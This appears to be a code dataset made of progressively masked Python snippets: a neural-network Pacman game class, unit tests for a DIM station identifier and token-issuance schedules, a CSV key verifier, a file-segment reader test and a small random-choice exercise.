"step-5": "import pygame\nfrom config import *\nfrom Map import *\nfrom NeuralNetwork import *\n\n\nclass Pacman(object):\n RADIUS = int(TILE_WIDTH/2)\n def __init__(self, mapa, neural_net):\n self.mapa = mapa\n self.pos_x = 11\n self.pos_y = 17\n\n self.vel_x = 1\n self.vel_y = 0\n\n self.isAlive = True\n\n self.Frame = 0\n self.score = 0\n\n self.count = 0\n self.count2 = 0\n self.lastMove = \"\"\n self.movesCount = 0\n\n self.neural_network = neural_net\n\n def update(self, input_data):\n self.Frame += 1\n\n self.handle_mov(input_data)\n self.handle_colision()\n\n if(self.count > TimeToStarve):\n self.killPacman()\n \n\n if(self.Frame == FPS/MPS):\n self.Frame = 0\n \n \n def handle_colision(self):\n if(self.mapa.map[self.pos_y][self.pos_x] == 2):\n self.mapa.getFruit(self.pos_y,self.pos_x)\n self.count = 0\n self.score += 1\n\n\n def draw(self, win):\n pygame.draw.circle(\n win,\n pygame.color.Color(\"yellow\"),\n (\n self.pos_x * TILE_WIDTH + self.RADIUS,\n self.pos_y * TILE_HEIGHT + self.RADIUS\n ), self.RADIUS\n )\n\n \n\n def handle_mov(self, input_data):\n movement = (self.vel_x, self.vel_y)\n vel_list = {\n 'up': (0, -1),\n 'down': (0, 1),\n 'left': (-1, 0),\n 'right': (1, 0)\n }\n\n movement = vel_list[self.neural_network.nextaction(input_data)]\n if self.lastMove == movement:\n self.movesCount += 1\n else:\n self.movesCount = 0\n self.lastMove = movement\n\n\n if(self.mapa.map[self.pos_y + movement[1]][self.pos_x + movement[0]] != 1):\n self.vel_x, self.vel_y = movement\n \n if(self.Frame == (FPS/MPS) and self.mapa.map[self.pos_y + self.vel_y][self.pos_x + self.vel_x] != 1):\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y\n self.count2 += 1\n \n self.count += 1\n\n def getPos(self):\n return (self.pos_x, self.pos_y)\n \n def getVel(self):\n return (self.vel_x, self.vel_y)\n \n def killPacman(self):\n self.isAlive = False",
"step-ids": [
7,
8,
10,
11,
12
]
}
|
[
7,
8,
10,
11,
12
] |
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
<|reserved_special_token_0|>
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import unittest
from dimp import ID, NetworkID
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while spent + package <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year,
day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while spent + package <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day,
package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (
year, day, package, spent, total_money - spent))
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
"""
DIM Station Test
~~~~~~~~~~~~~~~~
Unit test for DIM Station
"""
import unittest
from dimp import ID, NetworkID
class StationTestCase(unittest.TestCase):
def test_identifier(self):
print('\n---------------- %s' % self)
str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'
id1 = ID(str1)
self.assertEqual(id1.address.network, NetworkID.Station)
arr1 = [str1]
self.assertTrue(id1 in arr1)
def test_btc(self):
total_money = 2100 * 10000
package = 50
print('total BTC: %d, first package: %d' % (total_money, package))
spent = 0
order = 0
day = 0
year = 0
while (spent + package) <= total_money:
spent += package
order += 1
if order % (6 * 24) == 0:
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))
if year % 4 == 0:
package /= 2.0
print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))
def test_dimt(self):
total_money = 15 * 10000 * 10000
package = 2 ** 20
print('total money: %d, first package: %d' % (total_money, package))
spent = 0
day = 0
year = 0
while (spent + package) <= total_money and package >= 1:
spent += package
day += 1
if day % 365 == 0:
year += 1
print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))
if year % 2 == 0:
package /= 2.0
print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "533d0b883a0bbbb148f04826e4c0a2bcc31732e9",
"index": 6702,
"step-1": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n <mask token>\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nimport unittest\nfrom dimp import ID, NetworkID\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while spent + package <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year,\n day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while spent + package <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day,\n package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (\n year, day, package, spent, total_money - spent))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n DIM Station Test\n ~~~~~~~~~~~~~~~~\n\n Unit test for DIM Station\n\"\"\"\n\nimport unittest\n\nfrom dimp import ID, NetworkID\n\n\nclass StationTestCase(unittest.TestCase):\n\n def test_identifier(self):\n print('\\n---------------- %s' % self)\n str1 = 'gsp-s001@x77uVYBT1G48CLzW9iwe2dr5jhUNEM772G'\n id1 = ID(str1)\n self.assertEqual(id1.address.network, NetworkID.Station)\n arr1 = [str1]\n self.assertTrue(id1 in arr1)\n\n def test_btc(self):\n total_money = 2100 * 10000\n package = 50\n print('total BTC: %d, first package: %d' % (total_money, package))\n spent = 0\n order = 0\n day = 0\n year = 0\n while (spent + package) <= total_money:\n spent += package\n order += 1\n if order % (6 * 24) == 0:\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))\n if year % 4 == 0:\n package /= 2.0\n print('BTC OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))\n\n def test_dimt(self):\n total_money = 15 * 10000 * 10000\n package = 2 ** 20\n print('total money: %d, first package: %d' % (total_money, package))\n spent = 0\n day = 0\n year = 0\n while (spent + package) <= total_money and package >= 1:\n spent += package\n day += 1\n if day % 365 == 0:\n year += 1\n print('year %d, day %d: package=%f, spent=%f' % (year, day, package, spent))\n if year % 2 == 0:\n package /= 2.0\n print('DIMT OVER! year=%d, day=%d, pack=%f, spent=%f, left=%f' % (year, day, package, spent, (total_money - spent)))\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
print("Praktikum Programa Komputer ")
print("Exercise 7.21")
print("")
print("===========================")
print("Nama : Ivanindra Rizky P")
print("NIM : I0320054")
print("")
print("===========================")
print("")
import random
a = [23, 45, 98, 36]
print('a = ', a)
print('random 1')
print('choice = ', random.choice(a))
print('random 2')
print('choice = ', random.choice(a))
print('random 3')
print('choice = ', random.choice(a))
|
normal
|
{
"blob_id": "6b731e329eec3947a17ef8ee8280f2ddf980c81c",
"index": 7154,
"step-1": "<mask token>\n",
"step-2": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\n<mask token>\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-3": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\n<mask token>\na = [23, 45, 98, 36]\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-4": "print('Praktikum Programa Komputer ')\nprint('Exercise 7.21')\nprint('')\nprint('===========================')\nprint('Nama : Ivanindra Rizky P')\nprint('NIM : I0320054')\nprint('')\nprint('===========================')\nprint('')\nimport random\na = [23, 45, 98, 36]\nprint('a = ', a)\nprint('random 1')\nprint('choice = ', random.choice(a))\nprint('random 2')\nprint('choice = ', random.choice(a))\nprint('random 3')\nprint('choice = ', random.choice(a))\n",
"step-5": "print(\"Praktikum Programa Komputer \")\r\nprint(\"Exercise 7.21\")\r\nprint(\"\")\r\nprint(\"===========================\")\r\nprint(\"Nama : Ivanindra Rizky P\")\r\nprint(\"NIM : I0320054\")\r\nprint(\"\")\r\nprint(\"===========================\")\r\nprint(\"\")\r\nimport random\r\na = [23, 45, 98, 36]\r\nprint('a = ', a)\r\nprint('random 1')\r\nprint('choice = ', random.choice(a))\r\nprint('random 2')\r\nprint('choice = ', random.choice(a))\r\nprint('random 3')\r\nprint('choice = ', random.choice(a))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class ColumnKeyVerifier:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def epilogue(self):
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
<|reserved_special_token_0|>
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
<|reserved_special_token_1|>
import sys
from .csvtable import *
from .utils import *
from .reporter import Reporter
class ColumnKeyVerifier:
def __init__(self):
self.keys = {}
def prologue(self, table_name, header):
if 0 == len(header):
return False
# 키는 첫번째 컬럼에만 설정 가능하다.
return header[0].is_key()
def epilogue(self):
pass
def visit(self, header, columns):
key = int(columns[0])
if key in self.keys:
Reporter.error(f'중복된 키({key})가 존재합니다.')
self.keys[key] = True
return True
|
flexible
|
{
"blob_id": "eca4abf706fd094a40fdfc8ea483d71b0a018ce9",
"index": 4378,
"step-1": "<mask token>\n\n\nclass ColumnKeyVerifier:\n <mask token>\n <mask token>\n\n def epilogue(self):\n pass\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n <mask token>\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-3": "<mask token>\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-4": "import sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\n\nclass ColumnKeyVerifier:\n\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n self.keys[key] = True\n return True\n",
"step-5": "\nimport sys\nfrom .csvtable import *\nfrom .utils import *\nfrom .reporter import Reporter\n\nclass ColumnKeyVerifier:\n def __init__(self):\n self.keys = {}\n\n def prologue(self, table_name, header):\n if 0 == len(header):\n return False\n\n # 키는 첫번째 컬럼에만 설정 가능하다.\n return header[0].is_key()\n\n def epilogue(self):\n pass\n\n def visit(self, header, columns):\n key = int(columns[0])\n if key in self.keys:\n Reporter.error(f'중복된 키({key})가 존재합니다.')\n\n self.keys[key] = True\n\n return True\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
import unittest
from pyama.filereader import FileReader, Segment
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader('sample_reader_test.txt', regexes=[(
'name="(\\w+)"', 'END SEGMENT'), ('\\s*\\*\\s*START\\s*(\\w+)',
'END SEGMENT'), ('PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)', None)])
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment('name', 'file name')
line = (
' SNIPPET START A=B B=13 K=\'ha mi\' ZIG="ZA G" WITH hami -> "mami" '
)
FileReader('whatnot', ['onces']).analyze_parameters(line, segment)
self.assertEqual(segment.parameters['A'], 'B')
self.assertEqual(segment.parameters['B'], '13')
self.assertEqual(segment.parameters['K'], 'ha mi')
self.assertEqual(segment.parameters['ZIG'], 'ZA G')
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
#! /usr/bin/python
# -*- coding: utf8 -*-
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
import unittest
from pyama.filereader import FileReader,Segment
class TestFileReader(unittest.TestCase):
def test_reads_file(self):
reader = FileReader(
"sample_reader_test.txt",
regexes=[(r'name="(\w+)"', 'END SEGMENT'),
(r'\s*\*\s*START\s*(\w+)', 'END SEGMENT'),
(r"PYTHON\s+SEGMENT\s+(\w[\w\d_]*)", None)]
)
file = reader.read()
self.assertEqual(7, len(file.segments))
self.assertEqual('0', file.segments[0].name)
self.assertEqual(2, len(file.segments[0].text))
self.assertEqual('segmentOne', file.segments[1].name)
self.assertEqual(3, len(file.segments[1].text))
self.assertEqual('1', file.segments[2].name)
self.assertEqual(1, len(file.segments[2].text))
self.assertEqual('anotherSegment', file.segments[3].name)
self.assertEqual(6, len(file.segments[3].text))
self.assertEqual('2', file.segments[4].name)
self.assertEqual(2, len(file.segments[4].text))
self.assertEqual('python_segment', file.segments[5].name)
self.assertEqual(4, len(file.segments[5].text))
self.assertEqual('python_segment', file.segments[6].name)
self.assertEqual(3, len(file.segments[6].text))
def test_analyses_parameters(self):
segment = Segment("name","file name")
line = """ SNIPPET START A=B B=13 K='ha mi' ZIG="ZA G" WITH hami -> "mami" """
FileReader("whatnot",["onces"]).analyze_parameters(line,segment)
self.assertEqual(segment.parameters["A"],"B")
self.assertEqual(segment.parameters["B"],"13")
self.assertEqual(segment.parameters["K"],"ha mi")
self.assertEqual(segment.parameters["ZIG"],"ZA G")
if __name__ == '__main__':
unittest.main()
|
flexible
|
{
"blob_id": "92dc0bd3cfcddd98f99d8152d0221f047beb4fb0",
"index": 9492,
"step-1": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, 